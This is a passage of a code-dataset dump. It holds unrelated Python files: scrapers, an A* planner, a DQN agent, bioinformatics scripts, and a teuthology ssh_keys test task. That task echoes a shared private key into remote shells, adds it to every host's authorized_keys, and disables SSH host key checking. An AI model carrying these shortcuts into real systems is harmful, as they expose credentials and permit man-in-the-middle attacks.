switch_object_textures[name][\"node\"]\r\n\r\n\t\t\t\t# if need to switch to selected material\r\n\t\t\t\tcurrent_material = selected_node.GetObject().GetGeometry().GetMaterial(0)\r\n\t\t\t\tif current_material != selected_material:\r\n\t\t\t\t\tselected[\"n\"] = selected_node\r\n\t\t\t\t\tselected[\"m\"] = []\r\n\t\t\t\t\tgeo = selected_node.GetObject().GetGeometry()\r\n\t\t\t\t\tfor m in range(geo.GetMaterialCount()):\r\n\t\t\t\t\t\tselected[\"m\"].append(geo.GetMaterial(m))\r\n\t\t\t\t\t\tgeo.SetMaterial(m, selected_material)\r\n\t\t\t\t\t\tselected_material.SetTexture(\"diffuse_map\", current_material.GetTexture(\"diffuse_map\"))\r\n\r\n\t\t\t\t# switch if the trigger is triggered\r\n\t\t\t\tif click_on_switch and not button_pressed:\r\n\t\t\t\t\tif len(selected[\"m\"]) > 0:\r\n\t\t\t\t\t\tnew_diffuse_tex = plus.GetRendererAsync().LoadTexture(switch_object_textures[name][\"diffuse_map\"][switch_object_textures[name][\"index\"]])\r\n\t\t\t\t\t\tswitch_object_textures[name][\"index\"] += 
1\r\n\t\t\t\t\t\tif switch_object_textures[name][\"index\"] >= len(switch_object_textures[name][\"diffuse_map\"]):\r\n\t\t\t\t\t\t\tswitch_object_textures[name][\"index\"] = 0\r\n\r\n\t\t\t\t\t\tselected_material.SetTexture(\"diffuse_map\", new_diffuse_tex)\r\n\t\t\t\t\t\tselected[\"m\"][0].SetTexture(\"diffuse_map\", new_diffuse_tex)\r\n\r\n\r\n\r\n\t\t\t\t\t# else:\r\n\t\t# \thelper_2d.draw_line(scene_simple_graphic, pos_laser, pos_laser + dir_laser * 10,\r\n\t\t# \t gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\t\t# \tif not use_vr:\r\n\t\t# \t\thelper_2d.draw_cross(scene_simple_graphic, pos_laser + dir_laser * 0.2,\r\n\t\t# \t\t gs.Color(238 / 255, 235 / 255, 92 / 255), 0.01)\r\n\r\n\tif click_on_switch:\r\n\t\tif not button_pressed:\r\n\t\t\tbutton_pressed = True\r\n\telse:\r\n\t\tbutton_pressed = False","sub_path":"maneki-neko/build_viewer/plugins/switch_textures/switch_textures.py","file_name":"switch_textures.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"315732099","text":"from urllib.request import urlopen\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ndef injury_update():\n feed_url = 'https://www.cbssports.com/nba/injuries/daily'\n\n html = urlopen(feed_url)\n soup = BeautifulSoup(html, 'lxml')\n\n table = soup.find('table', {'class':'data'})\n #print(table.prettify())\n\n injury_df = pd.read_html(table.prettify())[0][1:]\n columns = injury_df.iloc[0]\n injury_df = injury_df[1:]\n injury_df.columns = columns\n #print(injury_df)\n\n injury_df.to_csv('injury_updates.csv', index=False)\n\nif __name__ == \"__main__\":\n injury_update()\n\n","sub_path":"injury_updates.py","file_name":"injury_updates.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"644035074","text":"from typing import Any, List, Tuple\n\nOUTPUT_ERROR = -1\nOUTPUT_KATAGO_STDERR = -0.5\nOUTPUT_INFO = 0\nOUTPUT_DEBUG = 1\nOUTPUT_EXTRA_DEBUG = 2\n\n\ndef var_to_grid(array_var: List[Any], size: Tuple[int, int]) -> List[List[Any]]:\n \"\"\"convert ownership/policy to grid format such that grid[y][x] is for move with coords x,y\"\"\"\n ix = 0\n grid = [[]] * size[1]\n for y in range(size[1] - 1, -1, -1):\n grid[y] = array_var[ix : ix + size[0]]\n ix += size[0]\n return grid\n\n\ndef evaluation_class(points_lost: float, eval_thresholds: List[float]):\n i = 0\n while i < len(eval_thresholds) - 1 and points_lost < eval_thresholds[i]:\n i += 1\n return i\n","sub_path":"core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523922097","text":"from heapq import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom .LineSegment2d import LineSegment2d\nfrom .Node2d import Node2d\nfrom .Vec2d import Vec2d\n\nclass GridSearch:\n def __init__(self, node_radius, xy_res):\n self.node_radius = node_radius\n self.xy_res = xy_res\n self.XYBounds = []\n self.obstacles_segments = []\n self.max_grid_x = 0\n self.max_grid_y = 0\n \n def euclidDistance(self, x1, y1, x2, y2):\n return ((x1-x2)**2 + (y1-y2)**2)**(1/2)\n \n def checkConstraints(self, next_node, curr_node):\n if next_node.grid_x < 0 or next_node.grid_x > self.max_grid_x or \\\n next_node.grid_y < 0 or next_node.grid_y > self.max_grid_y:\n return False\n \n if len(self.obstacles_segments) == 0:\n return True\n \n for obstacle in 
self.obstacles_segments:\n for obstacle_seg in obstacle:\n if obstacle_seg.distanceToPoint(Vec2d(next_node.x, next_node.y)) < self.node_radius:\n return False\n if LineSegment2d(Vec2d(curr_node.x, curr_node.y), Vec2d(next_node.x, next_node.y)).isIntersect(obstacle_seg):\n return False\n return True\n \n def generateNextNodes(self, curr_node):\n path_cost = curr_node.path_cost\n x = curr_node.x\n y = curr_node.y\n diag_dist = 2**(1/2)\n \n next_nodes = []\n up = Node2d(x, y + self.xy_res, self.xy_res, self.XYBounds)\n up.setPathCost(path_cost + 1)\n next_nodes.append(up)\n \n up_right = Node2d(x + self.xy_res, y + self.xy_res, self.xy_res, self.XYBounds)\n up_right.setPathCost(path_cost + diag_dist)\n next_nodes.append(up_right)\n \n right = Node2d(x + self.xy_res, y, self.xy_res, self.XYBounds)\n right.setPathCost(path_cost + 1)\n next_nodes.append(right)\n \n down_right = Node2d(x + self.xy_res, y - self.xy_res, self.xy_res, self.XYBounds)\n down_right.setPathCost(path_cost + diag_dist)\n next_nodes.append(down_right)\n \n down = Node2d(x, y - self.xy_res, self.xy_res, self.XYBounds)\n down.setPathCost(path_cost + 1)\n next_nodes.append(down)\n \n down_left = Node2d(x - self.xy_res, y - self.xy_res, self.xy_res, self.XYBounds)\n down_left.setPathCost(path_cost + diag_dist)\n next_nodes.append(down_left)\n \n left = Node2d(x - self.xy_res, y, self.xy_res, self.XYBounds)\n left.setPathCost(path_cost + 1)\n next_nodes.append(left)\n \n up_left = Node2d(x - self.xy_res, y + self.xy_res, self.xy_res, self.XYBounds)\n up_left.setPathCost(path_cost + diag_dist)\n next_nodes.append(up_left)\n \n return next_nodes\n \n def generateAStartPath(self, s_x, s_y, e_x, e_y, XYBounds, obstacles_vertices):\n self.obstacles_segments = self.getObstaclesSegments(obstacles_vertices)\n self.XYBounds = XYBounds\n self.max_grid_x = (XYBounds[1] - XYBounds[0]) // self.xy_res\n self.max_grid_y = (XYBounds[3] - XYBounds[2]) // self.xy_res\n \n start_node = Node2d(s_x, s_y, self.xy_res, XYBounds)\n end_node = Node2d(e_x, e_y, self.xy_res, XYBounds)\n final_node = None\n \n open_set = {}\n close_set = {}\n open_pq = []\n \n open_set[start_node.index] = start_node\n heappush(open_pq, (start_node.getCost(), start_node.index))\n \n explored_num = 0\n while len(open_pq) != 0:\n curr_node = open_set[heappop(open_pq)[1]]\n if curr_node == end_node:\n final_node = curr_node\n break\n \n close_set[curr_node.index] = curr_node\n next_nodes = self.generateNextNodes(curr_node)\n for next_node in next_nodes:\n if (not self.checkConstraints(next_node, curr_node)):\n continue\n if close_set.get(next_node.index) is not None:\n continue\n if open_set.get(next_node.index) is None:\n explored_num += 1\n next_node.setHeuCost(self.euclidDistance(next_node.grid_x, next_node.grid_y,\n end_node.grid_x, end_node.grid_y))\n next_node.pre_node = curr_node\n open_set[next_node.index] = next_node\n heappush(open_pq, (next_node.getCost(), next_node.index))\n \n if final_node is None:\n return None\n else:\n curr_node = final_node\n path_points = []\n while curr_node is not None: \n path_points.append(Vec2d(curr_node.x, curr_node.y))\n curr_node = curr_node.pre_node \n \n return path_points[::-1]\n \n def plot_path(self, figsize, path_points, optimized_trajectory=None):\n plt.figure(figsize=figsize)\n plt.xlim(self.XYBounds[0], self.XYBounds[1])\n plt.ylim(self.XYBounds[2], self.XYBounds[3])\n plt.xticks(np.arange(self.XYBounds[0], self.XYBounds[1], self.xy_res))\n plt.yticks(np.arange(self.XYBounds[2], self.XYBounds[3], self.xy_res))\n x_vec = 
list(map(lambda vec: vec.x, path_points))\n y_vec = list(map(lambda vec: vec.y, path_points))\n plt.plot(x_vec, y_vec)\n if optimized_trajectory:\n x_vec = list(map(lambda vec: vec.x, optimized_trajectory))\n y_vec = list(map(lambda vec: vec.y, optimized_trajectory))\n plt.scatter(x_vec, y_vec, alpha=0.7, c='black')\n for obstacle in self.obstacles_segments:\n for obstacle_seg in obstacle:\n plt.plot([obstacle_seg.start.x, obstacle_seg.end.x],\n [obstacle_seg.start.y, obstacle_seg.end.y], c='r')\n plt.grid()\n plt.show()\n \n @staticmethod\n def getObstaclesSegments(obstaclesVerticesVectors):\n obstacles = []\n for verticesVector in obstaclesVerticesVectors:\n obstacle_segments = []\n n = len(verticesVector)\n for i in range(n):\n if i < n-1:\n obstacle_segments.append(LineSegment2d(verticesVector[i], verticesVector[i+1]))\n elif n > 2:\n obstacle_segments.append(LineSegment2d(verticesVector[i], verticesVector[0]))\n obstacles.append(obstacle_segments)\n return obstacles","sub_path":"Optimizer/utils/GridSearch.py","file_name":"GridSearch.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"216540540","text":"import turtle\nfrom PIL import Image\nimport io,os\nfrom numpy import random\nimport gc\nimport numpy as np\nimport pdb\nimport cv2\n\nmask_info = []\nsize = 128\n\ndef save_bounding_box_info():\n\tbb_info = np.array(mask_info)\n\tnp.save('bb_info' , bb_info)\n\n\nclass dot(object):\n\tdef __init__(self):\n\t\tself.cv = turtle.Canvas(width=128, height=128)\n\t\tself.width = 128\n\t\tself.height = 128\n\t\t# this will tell us where is the dot located in the image\n\n\tdef save(self,file,path):\n\t\tself.cv.pack()\n\t\tself.cv.update()\n\t\tps = self.cv.postscript(colormode='gray')\n\t\timg = Image.open(io.BytesIO(ps.encode('utf-8')))\n\t\timg = np.array(img)\n\t\timg = cv2.resize(img , (128,128))\n\t\tos.makedirs('./dot_without_bg/' + path + '/' , exist_ok=True)\n\t\tcv2.imwrite('./dot_without_bg/' + path + '/' + str(file) +'.bmp' , img)\n\t\tself.cv.destroy()\n\n\tdef createDot(self):\n\t\t\n\t\t# place main body\n\t\tradius = 10\n\t\tcx = random.randint(radius,self.width-radius)\n\t\tcy = random.randint(radius,self.height-radius)\n\t\tx0 = cx - radius \n\t\ty0 = cy - radius \n\t\tx1 = cx + radius \n\t\ty1 = cy + radius \t\t\n\t\tself.cv.create_oval( x0 , y0 , x1 , y1 ,fill='Black' )\t\t\n\t\tmask_info.append(np.array([x0, y0 , x1 , y1]))\n\t\n\nfor i in range(1000):\n\tprint(i)\n\tobj = dot()\n\tobj.createDot()\n\tif i < 700:\n\t\tobj.save(i , 'train')\n\telse:\n\t\tobj.save(i , 'test')\n\nsave_bounding_box_info()","sub_path":"data/dot_without_bg.py","file_name":"dot_without_bg.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"264642490","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport os\r\nimport csv\r\n\r\npage = requests.get('https://www.whitehouse.gov/briefings-statements/')\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nbriefings = soup.find_all(class_='briefing-statement briefing-statement--results')\r\n\r\nif os.path.exists('whitehouse.csv'):\r\n os.remove('whitehouse.csv')\r\n\r\nf = open(\"whitehouse.csv\", 'a', newline='')\r\n\r\nfor item in briefings:\r\n title_div = item.find(class_='briefing-statement__title')\r\n link_tag = title_div.find('a')\r\n link = link_tag.attrs['href']\r\n title = link_tag.text\r\n time_tag = 
item.find(class_='meta__date')\r\n time = time_tag.text\r\n print(time)\r\n print(title)\r\n print(link)\r\n print('')\r\n\r\n tup = (time, title, link)\r\n writer = csv.writer(f)\r\n writer.writerow(tup)\r\n\r\nf.close()","sub_path":"whitehouse.py","file_name":"whitehouse.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481033428","text":"#!/usr/bin/python\nimport contextlib\nimport errno\nimport logging\nimport os\nimport paramiko\nimport re\n\nfrom cStringIO import StringIO\nfrom teuthology import contextutil\nfrom ..orchestra import run\nfrom ..orchestra.connection import create_key\n\nlog = logging.getLogger(__name__)\n\n# generatees a public and private key\ndef generate_keys():\n key = paramiko.RSAKey.generate(2048)\n privateString = StringIO()\n key.write_private_key(privateString)\n return key.get_base64(), privateString.getvalue()\n\n# deletes the keys and removes ~/.ssh/authorized_keys entries we added\ndef cleanup_keys(ctx, public_key):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n for host in ctx.cluster.remotes.iterkeys():\n username, hostname = str(host).split('@')\n log.info('cleaning up keys on {host}'.format(host=hostname, user=username))\n\n # try to extract a public key for the host from the ctx.config entries\n host_key_found = False\n for t, host_key in ctx.config['targets'].iteritems():\n\n if str(t) == str(host):\n keytype, key = host_key.split(' ',1)\n client.get_host_keys().add(\n hostname=hostname,\n keytype=keytype,\n key=create_key(keytype,key)\n )\n host_key_found = True\n log.info('ssh key found in ctx')\n\n # if we did not find a key, load the system keys\n if False == host_key_found:\n client.load_system_host_keys()\n log.info('no key found in ctx, using system host keys')\n\n client.connect(hostname, username=username)\n client.exec_command('rm ~/.ssh/id_rsa')\n client.exec_command('rm ~/.ssh/id_rsa.pub')\n\n # get the absolute path for authorized_keys\n stdin, stdout, stderr = client.exec_command('ls ~/.ssh/authorized_keys')\n auth_keys_file = stdout.readlines()[0].rstrip()\n\n mySftp = client.open_sftp()\n\n # write to a different authorized_keys file in case something\n # fails 1/2 way through (don't want to break ssh on the vm)\n old_auth_keys_file = mySftp.open(auth_keys_file)\n new_auth_keys_file = mySftp.open(auth_keys_file + '.new', 'w')\n out_keys = []\n\n for line in old_auth_keys_file.readlines():\n match = re.search(re.escape(public_key), line)\n\n if match:\n pass\n else:\n new_auth_keys_file.write(line)\n\n # close the files\n old_auth_keys_file.close()\n new_auth_keys_file.close()\n\n # now try to do an atomic-ish rename. 
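We wrote to authorized_keys.new first precisely so a failure cannot truncate the live file. 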
If we botch this, it's bad news\n stdin, stdout, stderr = client.exec_command('mv ~/.ssh/authorized_keys.new ~/.ssh/authorized_keys')\n\n mySftp.close()\n client.close()\n\n@contextlib.contextmanager\ndef tweak_ssh_config(ctx, config): \n run.wait(\n ctx.cluster.run(\n args=[\n 'echo', \n 'StrictHostKeyChecking no\\n', \n run.Raw('>'), \n run.Raw('/home/ubuntu/.ssh/config'),\n ],\n wait=False,\n )\n )\n\n try: \n yield\n\n finally:\n run.wait(\n ctx.cluster.run(\n args=['rm',run.Raw('/home/ubuntu/.ssh/config')],\n wait=False\n ),\n )\n\n@contextlib.contextmanager\ndef push_keys_to_host(ctx, config, public_key, private_key): \n\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n for host in ctx.cluster.remotes.iterkeys():\n log.info('host: {host}'.format(host=host))\n username, hostname = str(host).split('@')\n \n # try to extract a public key for the host from the ctx.config entries\n host_key_found = False\n for t, host_key in ctx.config['targets'].iteritems():\n\n if str(t) == str(host):\n keytype, key = host_key.split(' ',1)\n client.get_host_keys().add(\n hostname=hostname,\n keytype=keytype,\n key=create_key(keytype,key)\n )\n host_key_found = True\n log.info('ssh key found in ctx')\n\n # if we did not find a key, load the system keys\n if False == host_key_found:\n client.load_system_host_keys()\n log.info('no key found in ctx, using system host keys')\n\n log.info('pushing keys to {host} for {user}'.format(host=hostname, user=username))\n\n client.connect(hostname, username=username)\n client.exec_command('echo \"{priv_key}\" > ~/.ssh/id_rsa'.format(priv_key=private_key))\n # the default file permissions cause ssh to balk\n client.exec_command('chmod 500 ~/.ssh/id_rsa')\n client.exec_command('echo \"ssh-rsa {pub_key} {user_host}\" > ~/.ssh/id_rsa.pub'.format(pub_key=public_key,user_host=host))\n \n # for this host, add all hosts to the ~/.ssh/authorized_keys file\n for inner_host in ctx.cluster.remotes.iterkeys():\n client.exec_command('echo \"ssh-rsa {pub_key} {user_host}\" >> ~/.ssh/authorized_keys'.format(pub_key=public_key,user_host=str(inner_host)))\n\n\n client.close()\n\n try: \n yield\n\n finally:\n # cleanup the keys\n log.info(\"Cleaning up SSH keys\")\n cleanup_keys(ctx, public_key)\n\n\n@contextlib.contextmanager\ndef task(ctx, config):\n \"\"\"\n Creates a set of RSA keys, distributes the same key pair\n to all hosts listed in ctx.cluster, and adds all hosts\n to all others authorized_keys list. \n\n During cleanup it will delete .ssh/id_rsa, .ssh/id_rsa.pub \n and remove the entries in .ssh/authorized_keys while leaving\n pre-existing entries in place. 
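\n\n An empty config mapping is sufficient: the task body only type-checks it.\n Illustrative job-YAML usage (task name assumed from this module):\n\n tasks:\n - ssh_keys: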
\n \"\"\"\n\n if config is None:\n config = {}\n assert isinstance(config, dict), \\\n \"task hadoop only supports a dictionary for configuration\"\n\n # this does not need to do cleanup and does not depend on \n # ctx, so I'm keeping it outside of the nested calls\n public_key_string, private_key_string = generate_keys()\n\n with contextutil.nested(\n lambda: push_keys_to_host(ctx, config, public_key_string, private_key_string),\n lambda: tweak_ssh_config(ctx, config), \n\n ):\n yield\n\n","sub_path":"teuthology/task/ssh_keys.py","file_name":"ssh_keys.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214652777","text":"# -----------------------------\r\n# File: Deep Q-Learning Algorithm\r\n# Author: Flood Sung\r\n# Date: 2016.3.21\r\n# -----------------------------\r\nimport random\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport environment\r\nimport itertools\r\nfrom gamestate import GameState\r\n\r\nfrom shared import *\r\n\r\nfrom collections import deque \r\n\r\n# Hyper Parameters:\r\nFRAME_PER_ACTION = 1\r\nGAMMA = 0.95 # decay rate of past observations\r\nOBSERVE = 50000. # timesteps to observe before training\r\n#OBSERVE = 100. # timesteps to observe before training\r\nEXPLORE = 1000000. # frames over which to anneal epsilon\r\nFINAL_EPSILON = 0.1#0.001 # final value of epsilon\r\nINITIAL_EPSILON = 1.0#0.01 # starting value of epsilon\r\nREPLAY_MEMORY = 1000000 # number of previous transitions to remember\r\nBATCH_SIZE = 32 # size of minibatch\r\nUPDATE_TIME = 10000\r\nHIDDEN_LAYER_NODES = 256\r\n\r\n\r\nclass BrainDQN:\r\n\r\n def __init__(self,input_vector_length, actions, history=8):\r\n # init replay memory\r\n self.replayMemory = deque()\r\n # init some parameters\r\n self.timeStep = 0\r\n self.epsilon = INITIAL_EPSILON\r\n self.actions = actions\r\n self.history = history\r\n # init Q network\r\n self.stateInput,self.QValue,self.W_fc1,self.b_fc1,self.W_fc2,self.b_fc2 = self.createQNetwork(input_vector_length)\r\n\r\n # init Target Q Network\r\n self.stateInputT,self.QValueT,self.W_fc1T,self.b_fc1T,self.W_fc2T,self.b_fc2T = self.createQNetwork(input_vector_length)\r\n\r\n self.copyTargetQNetworkOperation = [self.W_fc1T.assign(self.W_fc1),self.b_fc1T.assign(self.b_fc1),self.W_fc2T.assign(self.W_fc2),self.b_fc2T.assign(self.b_fc2)]\r\n\r\n self.createTrainingMethod()\r\n\r\n # saving and loading networks\r\n self.saver = tf.train.Saver()\r\n self.session = tf.InteractiveSession()\r\n self.session.run(tf.initialize_all_variables())\r\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n self.saver.restore(self.session, checkpoint.model_checkpoint_path)\r\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\r\n else:\r\n print(\"Could not find old network weights\")\r\n\r\n\r\n def createQNetwork(self, input_vector_length):\r\n # we don't need the convolutional layer, we go straight to MLP\r\n \r\n # network weights\r\n W_fc1 = self.weight_variable([input_vector_length*self.history,HIDDEN_LAYER_NODES])\r\n b_fc1 = self.bias_variable([HIDDEN_LAYER_NODES])\r\n\r\n W_fc2 = self.weight_variable([HIDDEN_LAYER_NODES,self.actions])\r\n b_fc2 = self.bias_variable([self.actions])\r\n\r\n # input layer\r\n X = tf.placeholder(\"float\", [None, input_vector_length*self.history])\r\n h_fc1 = tf.nn.relu(tf.matmul(X,W_fc1) + b_fc1)\r\n\r\n # Q Value layer\r\n QValue = tf.matmul(h_fc1,W_fc2) + 
b_fc2\r\n\r\n return X,QValue,W_fc1,b_fc1,W_fc2,b_fc2\r\n\r\n def copyTargetQNetwork(self):\r\n self.session.run(self.copyTargetQNetworkOperation)\r\n\r\n def createTrainingMethod(self):\r\n self.actionInput = tf.placeholder(\"float\",[None,self.actions])\r\n self.yInput = tf.placeholder(\"float\", [None]) \r\n Q_Action = tf.reduce_sum(tf.multiply(self.QValue, self.actionInput), reduction_indices = 1)\r\n self.cost = tf.reduce_mean(tf.square(self.yInput - Q_Action))\r\n self.trainStep = tf.train.RMSPropOptimizer(0.00025,0.99,0.0,1e-6).minimize(self.cost)\r\n\r\n\r\n def trainQNetwork(self):\r\n\r\n # Step 1: obtain random minibatch from replay memory\r\n minibatch = random.sample(self.replayMemory,BATCH_SIZE)\r\n state_batch = [data[0] for data in minibatch]\r\n action_batch = [data[1] for data in minibatch]\r\n reward_batch = [data[2] for data in minibatch]\r\n nextState_batch = [data[3] for data in minibatch]\r\n\r\n # Step 2: calculate y \r\n y_batch = []\r\n QValue_batch = self.QValueT.eval(feed_dict={self.stateInputT:nextState_batch})\r\n for i in range(0,BATCH_SIZE):\r\n terminal = minibatch[i][4]\r\n if terminal:\r\n y_batch.append(reward_batch[i])\r\n else:\r\n y_batch.append(reward_batch[i] + GAMMA * np.max(QValue_batch[i]))\r\n\r\n self.trainStep.run(feed_dict={\r\n self.yInput : y_batch,\r\n self.actionInput : action_batch,\r\n self.stateInput : state_batch\r\n })\r\n\r\n # save network every 100000 iteration\r\n if self.timeStep % 10000 == 0:\r\n self.saver.save(self.session, 'saved_networks/' + 'network' + '-dqn', global_step = self.timeStep)\r\n\r\n if self.timeStep % UPDATE_TIME == 0:\r\n self.copyTargetQNetwork()\r\n\r\n \r\n def setPerception(self,nextObservation,action,reward,terminal):\r\n # replaces the last item in the list with the new observation\r\n newState = self.currentState[len(nextObservation):] + nextObservation\r\n self.replayMemory.append((self.currentState,action,reward,newState,terminal))\r\n if len(self.replayMemory) > REPLAY_MEMORY:\r\n self.replayMemory.popleft()\r\n if self.timeStep > OBSERVE:\r\n # Train the network\r\n self.trainQNetwork()\r\n\r\n # print info\r\n state = \"\"\r\n if self.timeStep <= OBSERVE:\r\n state = \"observe\"\r\n elif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:\r\n state = \"explore\"\r\n else:\r\n state = \"train\"\r\n\r\n print(\"TIMESTEP\", self.timeStep, \"/ STATE\", state, \"/ EPSILON\", self.epsilon)\r\n\r\n self.currentState = newState\r\n self.timeStep += 1\r\n\r\n def getAction(self):\r\n QValue = self.QValue.eval(feed_dict= {self.stateInput:[self.currentState]})[0]\r\n action = np.zeros(self.actions)\r\n action_index = 0\r\n if self.timeStep % FRAME_PER_ACTION == 0:\r\n if random.random() <= self.epsilon:\r\n action_index = random.randrange(self.actions)\r\n action[action_index] = 1\r\n else:\r\n action_index = np.argmax(QValue)\r\n action[action_index] = 1\r\n else:\r\n action[0] = 1 # do nothing\r\n\r\n # change episilon\r\n if self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:\r\n self.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON)/EXPLORE\r\n\r\n return action\r\n\r\n def setInitState(self,observation):\r\n self.currentState = []\r\n for i in range(self.history):\r\n self.currentState.extend(observation)\r\n\r\n def weight_variable(self,shape):\r\n initial = tf.truncated_normal(shape, stddev = 0.01)\r\n return tf.Variable(initial)\r\n\r\n def bias_variable(self,shape):\r\n initial = tf.constant(0.01, shape = shape)\r\n return tf.Variable(initial)\r\n \r\n# Used for evaluating the network, 
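i.e. pure greedy exploitation (argmax over Q) with no replay storage or training updates, 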
not exploring and training\r\nclass PlayDQN(BrainDQN):\r\n \r\n def __init__(self,input_vector_length, actions, history=8):\r\n BrainDQN.__init__(self, input_vector_length, actions, history)\r\n \r\n def setPerception(self,nextObservation,action,reward,terminal):\r\n # replaces the last item in the list with the new observation\r\n self.currentState = self.currentState[len(nextObservation):] + nextObservation\r\n self.timeStep += 1\r\n \r\n def getAction(self):\r\n QValue = self.QValue.eval(feed_dict= {self.stateInput:[self.currentState]})[0]\r\n action = np.zeros(self.actions)\r\n action[np.argmax(QValue)] = 1\r\n return action","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"528235832","text":"import sys, csv, re\n\nScas_Mut_Gene_in = sys.argv[1]\nScas_Gene_List_in = sys.argv[2]\nScer_Gene_List_in = sys.argv[3]\nHomology_List_in = sys.argv[4]\nScas_Scer_Gene_Annotation_out = sys.argv[5]\nScas_Scer_No_Ortholog_out = sys.argv[6]\nSNPS_Table_out = sys.argv[7]\n\nScas_Mut_Gene_in_open = csv.reader(open(Scas_Mut_Gene_in,'U'),delimiter=\"\\t\")\nScas_Gene_List_in_open = csv.reader(open(Scas_Gene_List_in,'U'),delimiter=\"\\t\")\nScer_Gene_List_in_open = csv.reader(open(Scer_Gene_List_in,'U'),delimiter=\"\\t\")\nHomology_List_in_open = csv.reader(open(Homology_List_in,'U'),delimiter=\"\\t\")\nScas_Scer_Gene_Annotation_out_open = open(Scas_Scer_Gene_Annotation_out,'w')\nScas_Scer_No_Ortholog_out_open = open(Scas_Scer_No_Ortholog_out,'w')\nSNPS_Table_out_open = open(SNPS_Table_out,'a')\n\nScas_Mut_Gene_List = [] #If you do not do this, it only iterates through the list once. Property of csv reader.\nfor line in Scas_Mut_Gene_in_open:\n Scas_Mut_Gene_List.append(line)\n\nScas_Gene_List = [] #If you do not do this, it only iterates through the list once. Property of csv reader.\nfor line in Scas_Gene_List_in_open:\n Scas_Gene_List.append(line)\n\nScer_Gene_List = [] #If you do not do this, it only iterates through the list once. 
Property of csv reader.\nfor line in Scer_Gene_List_in_open:\n Scer_Gene_List.append(line)\n\nHomology_List = []\nfor line in Homology_List_in_open:\n Homology_List.append(line)\n\nScas_Mut_Ortholog_List = [] \nScas_Mut_No_Ortholog_List = []\n\nSNPS_Considered = 0\n\nfor line in Scas_Mut_Gene_List:\n for row in Scas_Gene_List:\n if line[0] == row[0]:\n Scas_Mut_Ortholog_List.append(row[0])\n Scas_Mut_No_Ortholog_List.append(row[0])\n SNPS_Considered+=1\n\nSNPS_Table_out_open.write(\"Nonsynonymous Ortholog Search-\"+'\\n') \nSNPS_Table_out_open.write(\"SNPs Considered:\"+\" \"+str(SNPS_Considered)+'\\n') \n\nScas_Mut_Ortholog_Set = set(Scas_Mut_Ortholog_List)\nScas_Mut_No_Ortholog_Set = set(Scas_Mut_No_Ortholog_List)\n\nScer_Orthologs = len(Scas_Mut_Ortholog_Set)\n\nSNPS_Table_out_open.write(\"Genes Considered:\"+\" \"+str(Scer_Orthologs)+'\\n')\n\nScas_Mut_Ortholog_List_2 = list(Scas_Mut_Ortholog_Set)\nScas_Mut_No_Ortholog_List_2 = list(Scas_Mut_No_Ortholog_Set)\n\nScas_Mut_Extended_Ortholog_List = []\n\nfor line in Scas_Mut_Ortholog_List_2:\n for row in Scas_Gene_List:\n if line == row[0]:\n Scas_Mut_Extended_Ortholog_List.append(row)\n\nScas_Ortholog_List = []\nTemp_Scas_Ortholog_List = []\nMatch = 0\n\nfor line in Scas_Mut_Extended_Ortholog_List:\n for i in Scer_Gene_List:\n if re.search(i[0], line[8]):\n Match+=1\n Scer_Orthologs-=1\n Scas_Ortholog_List.append(line[0]+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8]) \n Temp_Scas_Ortholog_List.append(line[0])\n\nfor line in Temp_Scas_Ortholog_List:\n for row in Scas_Mut_No_Ortholog_List_2:\n if row == line:\n Scas_Mut_No_Ortholog_List_2.remove(row)\n\nfor line in Scas_Mut_No_Ortholog_List_2:\n for row in Homology_List:\n if re.search(line, row[4]) and re.search(\"---\", row[11]) and re.search(\"---\", row[21]) or re.search(line, row[28]) and re.search(\"---\", row[11]) and re.search(\"---\", row[21]):\n if line == \"NCAS0J02110\":\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"AGO1\"+\"\\t\"+\"Argonaute Protein\")\n Temp_Scas_Ortholog_List.append(line)\n elif line == \"NCAS0C00230\":\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"DCR1\"+\"\\t\"+\"Dicer Protein\")\n Temp_Scas_Ortholog_List.append(line)\n else:\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"---\"+\"\\t\"+\"Likely part of transposable element\")\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(line, row[4]):\n for i in Scer_Gene_List:\n if re.search(row[11], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(row[21], i[0]) and not re.search(row[11], 